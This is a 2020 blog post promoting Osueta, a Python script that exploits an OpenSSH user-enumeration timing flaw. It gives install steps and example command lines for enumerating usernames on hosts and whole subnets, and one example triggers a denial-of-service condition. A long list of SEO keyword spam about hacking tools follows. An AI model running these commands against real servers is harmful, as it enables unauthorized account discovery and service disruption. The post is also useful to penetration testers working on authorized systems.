Friday, August 21, 2020

Osueta: A Simple Python Script To Exploit The OpenSSH User Enumeration Timing Attack


About Osueta?
   Osueta it's a simple Python 2 script to exploit the OpenSSH User Enumeration Timing Attack, present in OpenSSH versions <= 7.2 and >= 5.*. The script has the ability to make variations of the username employed in the bruteforce attack, and the possibility to establish a DoS condition in the OpenSSH server.

    Read more: OpenSSH User Enumeration Time-Based Attack

   The bug was corrected in OpenSSH version 7.3.

   Authors of Osueta:

Osueta's Installation
   For Linux users, open your Terminal and enter these commands:
   If you're Windows users, follow these steps:
  • Install Python 2.7.x from Python.org first. On Install Python 2.7.x Setup, choose Add python.exe to Path.
  • Download Osueta-master zip file.
  • Then unzip it.
  • Open CMD or PowerShell window at the Osueta folder you have just unzipped and enter these commands:
    pip install python-nmap paramiko IPy
    python osueta.py -h

Advice: Like others offensive tools, the authors disclaims all responsibility in the use of this script.

Osueta help menu:

Osueta's examples:
   A single user enumeration attempt with username variations:
python2 osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes


   A single user enumeration attempt with no user variations a DoS attack:
python2 osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v no --dos yes


   Scanning a C class network with only one user:
python2 osueta.py -H 192.168.1.0/24 -p 22 -U root -v no 


   Scanning a C class network with usernames from a file, delay time 15 seconds and a password of 50000 characters:
python2 osueta.py -H 192.168.1.0/24 -p 22 -L usernames.txt -v yes -d 15 -l 50


Related word


  1. Pentest Tools Windows
  2. What Are Hacking Tools
  3. Hack Tool Apk
  4. Pentest Tools Online
  5. Pentest Tools
  6. Ethical Hacker Tools
  7. Hacker Tools For Mac
  8. Hacking Tools
  9. Hacker Security Tools
  10. Hacker Security Tools
  11. Hacking Tools For Beginners
  12. Easy Hack Tools
  13. Hack Tools For Ubuntu
  14. Pentest Tools For Android
  15. Hack Tools For Games
  16. Hacker Tools 2019
  17. Hacker Tools Github
  18. Hack Tools For Ubuntu
  19. Best Hacking Tools 2019
  20. Hack Tools
  21. Hacking Tools Hardware
  22. Termux Hacking Tools 2019
  23. Pentest Tools Download
  24. Hacking Tools For Mac
  25. Hacker Tools Linux
  26. Growth Hacker Tools
  27. Pentest Tools Alternative
  28. Hacking Tools Hardware
  29. Growth Hacker Tools
  30. Usb Pentest Tools
  31. Best Pentesting Tools 2018
  32. Hacking Tools For Windows 7
  33. Hacking Tools Windows 10
  34. Hacker Hardware Tools
  35. Hacking Tools Name
  36. Hacking Tools
  37. Hacker Tools Online
  38. Hacker Tools For Pc
  39. Pentest Reporting Tools
  40. Underground Hacker Sites
  41. Hacking Tools 2020
  42. Hacking Tools Github
  43. Tools 4 Hack
  44. Pentest Tools Bluekeep
  45. Tools 4 Hack
  46. Hacker Tools Windows
  47. Hack Tool Apk
  48. Hacking Tools Software
  49. Hacking Tools For Kali Linux
  50. Hacker Tools Software
  51. Tools For Hacker
  52. Wifi Hacker Tools For Windows
  53. Hacker Tools For Windows
  54. Hacker Hardware Tools
  55. Hacking Tools Kit
  56. Hacker Techniques Tools And Incident Handling
  57. Hacking Tools 2019
  58. Pentest Tools Linux
  59. Hacking App
  60. Hacking Tools For Kali Linux
  61. Hacker Tool Kit
  62. Pentest Box Tools Download
  63. Hack Apps
  64. Pentest Tools Windows
  65. Pentest Tools Framework
  66. Pentest Tools Website Vulnerability
  67. Hack Tools For Ubuntu
  68. Hacking Tools Hardware
  69. Hacker Tools Free Download
  70. Pentest Tools Free
  71. Hack Tools Github

No comments:

Post a Comment